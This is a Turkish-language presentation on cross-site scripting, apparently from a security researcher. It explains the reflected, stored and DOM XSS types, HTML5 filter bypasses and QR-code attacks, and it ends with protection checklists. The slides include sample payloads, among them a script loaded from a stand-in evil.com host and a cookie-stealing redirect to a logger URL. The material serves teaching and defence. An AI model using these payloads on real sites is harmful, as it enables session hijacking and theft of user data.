Web uygulama güvenliği ve Javascript Injection Methodları

1. JavaScript Injections
● Bilgi Güvenliği Araştırmacısı @SignalSec
● Pentester
● Yazılım geliştirici
● Open-Source sever.
@evrnyalcin
www.signalsec.com/blog

2. Index
0x01 Xss nedir?
0x02 Reflected, Stored, Dom XSS
0x03 Html5 Xss
0x04 Qrcode Xss
0x05 Motivasyon
0x06 Korunma Yöntemleri

3. Xss(cross-site scripting)
● Çapraz site betik saldırısı
● Xss, en yaygın web saldırılarından birisidir.
(Top10)
● Html, Css, JavaScript, Xml, DOM, Cookie, URI,
VBscript kullanılarak yapılır.

4. Xss Saldırı Çeşitleri
● Reflected
● Stored
● DOM

5. Tarayıcı Bileşenleri

6. Reflected Xss

7. Değişen ne?
URL :
Gonder.php?ad=justin&soyad=biber
Kaynak kodu :
$_GET['ad']
$_GET['soyad']

8. Yanıt
Merhaba $_GET['ad'] $_GET['soyad']

9. Reflected Xss
Gonder.php?ad=justin<Saldırı vektörü buraya
gelecek>&soyad=biber
● Saldırı Vektörü : <script>alert(1);</script>

10. Alert!

11. Stored Xss

12. Stored Xss
Method : POST
Gonder.php?ad=justin&soyad=biber
Kayıtlı Kullanıcılar:

13. Stored Xss
Gonder.php?ad=justin<Saldırı vektörü buraya
gelecek>&soyad=biber
● Saldırı Vektörü : <script>alert(1);</script>

14. Alert!

15. DOM nedir?
● DOM(Document Object Model) – Belge Nesne
Yapısı
● DOM sayfa içindeki herhangi bir nesnenin
özelliğine müdahele edebilmemize, nesne
özelliklerini değiştirebilmemize olanak sağlar

16. DOM XSS
● DOM nesnelerine müdahale edilmesiyle ortaya
çıkan bir açıktır.
● DOM-XSS, client-side bir açıktır.
● URL parametreleri, XMLHttpRequest , HTTP
headers vb gibi...
● Reflected, Stored kadar tehlikeli bir açıktır.

17. DOM XSS Source&Sinks
● Source : Saldırgan tarafından etkilenen DOM
özellikleri
● Sink: DOM özellikleri, Javascript fonksiyonları
vb gibi alanlar istemci taraflı kod çalıştırabilirler.

18. Source
● document.URL
● document.URLUencoded
● document.location(.pathname|.href|.search|.ha
sh)
● window.location(.pathname|.href|.search|.hash
)

19. Source
● Document.cookie
● SessionStorage
● LocalStorage
● Web SQL Database
● Indexed DB

20. Source
● Window.name
● Document.referer
● history(Html5)

21. Sinks
InnerHTML, outerHTML, document.write
● Eval, execScript, function, setTimeout,
setInterval, script.src, iframe.src,
location(replace|assign)

22. DOM-based
● www.ornek.com/#key=value
● www.ornek.com/#key=value<script src=”
http://www.evil.com”></script>

23. Dom-Xss örnek
<script type="text/javascript">
var param = location.hash.split("#")[1];
document.write("Merhaba " + param + "!");
</script>

24. Dom-Xss örnek
● ornek.html#<script>alert(1)</script>
IE 6, 7, 8, 9
Chrome 15 (XSS Filter Block)
Firefox 3, 4, 5, 6, 7

25. Jquery Güvenli mi?
● Javascript Güvenliği = Jquery Güvenliği
● Jquery = Sink (bugs.jquery.com)

26. Bankalar Jquery Kullanırsa
Teori :
● Dom Xss açığı
● Top10 bankalar:
jQuery 1.3.2.min.js, jQuery 1.2.3 vs
● Pratik?

27. Jquery 1.6.1
Saldırı Vektörü : http://ornek.com/#<img src=/
onerror=alert(1)>

28. Html5
● Html5 > Html4
● Yeni etiketler, özellikler
● Yeni API'ler
● Flash,Silverlight,java gibi eklentilere daha az
ihtiyaç duyacağız.
● Clienr-side storage, drag-drop, web sockets
● Firefox, Chrome, Safari ve Opera destekliyor.

29. Bypass filters
● <script>, <img> gibi tagları blokladım!
<video src=1 onerror=alert(1)>
<audio src=1 onerror=alert(1)>
=> http://html5sec.org/

30. Bypass Filters
● <, > gibi tagları blokladım!
<form id onforminput=alert(1)><input></form>
<button form=test onformchange=alert(2)>

31. Local-Storage
<script>
alert(localStorage.getItem('SessionID'));
</script>

32. Qrcode(Karekod)
● QRCode(Quick Response) adını kelimelerinin
baş harflerinden alır.
● Son yıllarda, Reklam panolarında,
Kartvizitlerde, mobil ödemelerde vs kullanılıyor
Barkod içeriği kullanıcıyı ,
● internet adresine, e-posta adresine, telefon
numarasına, iletişim bilgilerinie sms/mms,
coğrafi konum bilgisine yönlendirebilir.

33. En büyük saldırı vektörü :)

34. EvilQR
Mobil cihazlar, hackerler için altın madenidir.
● Kişisel bilgilerin çalınması
● Konum bilgisi çalınması
● 3G, GPRS, Wi-Fi, Blue-Tooth vs. Uzaktan kontrol
ile aktif edilmesi.
● Kredi kartı bilgileri
● Sosyal hesapların deface edilmesi(Twitter,
Facebook vs)

35. EvilQR
2 durum oluşturduk:
● Javascript kodu çalıştır.
● Kullanıcıyı zararlı içeriğe yönlendir.

36. EvilQR saldırı vektörleri

37. EvilQR analiz

38. Decode

39. QR okuyucu test

40. Güvenlik Önerileri
● Bilmediğiniz kaynaklarda QR-code kullanmayın
● QR okuyucunuzda güvenlik açığı olup
olmadığına emin olun

41. Motivasyon
Saldırı vektörü :
<script>alert(document.location)</script>

42. Motivasyon
● Xss açığı
vuln.php?id=<script>document.location="
http://example.com/logger.php?cookie
="+document.cookie;</script>
● JavaScript ile klavye hareketlerini takip
et(onkeypress event)
● Html2canvas ile ekran görüntülerini çal

43. Motivasyon
● Samy worm (myspace) : Myspace'in çökmesine
sebep olmuştur
● Yahoo Yamanner Worm : Web-mail sistemine
bulaşmış ve spam yapmıştır.
● Orkut Worm : 300.000-600.000 kişiye bulaştığı
söyleniyor.

44. Motivasyon
● Tumblr ağı şu an 65 milyon blog, 27,6 milyar
post barındırıyor
● Tumblr Stored Xss
Saldırı vektörü :
tester"><img src='x'
onerror="alert(document.cookie)" />

45. Motivasyon
www.xssed.com

46. Motivasyon
www.shazzer.co.uk | Online Fuzzer

47. Motivasyon
Dominator(Dom Xss Scanner)

48. Motivasyon
XSS Challenge

49. Motivasyon
● CIfrex Security Research Tool
● Ücretsiz
● Php tabanlı
● “Apache2 Undefined Charset UTF-7 XSS
Vulnerability” ve nicesi
● Cxsecurity.com

50. Motivasyon
Herşeyin bir bedeli var :) Google, Microsoft,
Facebook, Twitter, Adobe, Ebay, Paypal vs

51. Zafiyeti ifşa etmek
● Responsible Disclosure:
1- Üretici ile temasa geçilir.
2- POC (proof-of-concept code) paylaşılır.
3- Anlaşırlar.
4- exploit-db.com gibi bir sitede yayınlanır.

52. Zafiyeti ifşa etmek -2
● Limited Disclosure:
1- Üretici ile temasa geçilir.
2- POC, herhangi bir bilgi verilmez.

53. Zafiyet ifşa etmek -3
● No Disclosure:
1- Deface

54. Korunma
● Html taglarını kapattınız mı?
● Kullanıcı girdilerinde ' “ karakterlerini
denediniz mi?
● Url link, attr vs değerlerinde farklı içerikler
denediniz mi?
● Karakter kodlamasına dikkat ettiniz mi?
● Response-header için Content-Type
tanımladınız mı?

55. Korunma
● HttpOnly kullanıyor musunuz?
● Cache-Control header, http üzerindeki kullanıcılar için ne durumda?
● 3. parti javascriptler içeri aktarılıyor mu?
● Session cookie korunuyor mu?
● Http header'ı kullanıcılar değiştirilebiliyor mu?
● Kullanıcı dosya yükleyebiliyor mu?
● Kullanıcı görsel vs yükleyebiliyor mu? Yüklüyorsa dosya içeriğini ve
aynı domainde olup olmadığını kontrol ediyor musunuz?
● API erişimi sağlıyormusunuz? Evetse, aynı domainde mi ve cross-
domain kısıtlaması var mı?

56. Sonuç?
● Bütün kullanıcı girdileri tehlikelidir.
● İnsan faktörü

57. TEŞEKKÜRLER
@evrnyalcin | @xsuperbug